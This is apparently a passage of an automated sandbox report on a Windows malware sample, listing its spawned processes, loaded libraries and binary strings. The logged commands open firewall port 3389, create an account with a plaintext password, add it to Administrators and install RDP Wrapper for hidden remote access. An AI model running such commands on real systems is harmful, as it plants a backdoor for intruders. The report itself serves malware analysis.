                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net user
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: version.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: amsi.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: userenv.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: msasn1.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: rasman.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exe | Section loaded: winnsi.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: wkscli.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: samcli.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\net.exe | Section loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samcli.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: dsrole.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: wkscli.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: logoncli.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cryptbase.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: cscapi.dll
                            Source: C:\Windows\SysWOW64\net1.exe | Section loaded: samlib.dll
                            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe | Section loaded: wininet.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
                            Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
                            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile written: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.iniJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDirectory created: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to behavior
                            Source: hloRQZmlfg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: hloRQZmlfg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbIs>b source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Xml.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: costura.costura.pdb.compressedlB source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.DirectoryServices.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: costura.costura.pdb.compressed source: hloRQZmlfg.exe
                            Source: Binary string: System.Configuration.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: rdpclip.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: RfxVmt.pdbGCTL source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Configuration.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: tem.pdb source: hloRQZmlfg.exe, 00000000.00000002.1921092597.0000000005836000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: hloRQZmlfg.exe, 00000000.00000002.1921092597.00000000057A1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.Core.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.pdb4 source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.DirectoryServices.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbH source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: rdpclip.pdbJ source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr
                            Source: Binary string: mscorlib.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: System.Management.ni.pdb source: WER91CD.tmp.dmp.38.dr
                            Source: Binary string: HPJo0C:\Windows\mscorlib.pdb source: hloRQZmlfg.exe, 00000000.00000002.1919019826.0000000000CF5000.00000004.00000010.00020000.00000000.sdmp
                            Source: Binary string: RfxVmt.pdb source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rfxvmt.dll.8.dr
                            Source: Binary string: System.Core.pdb source: WER91CD.tmp.dmp.38.dr
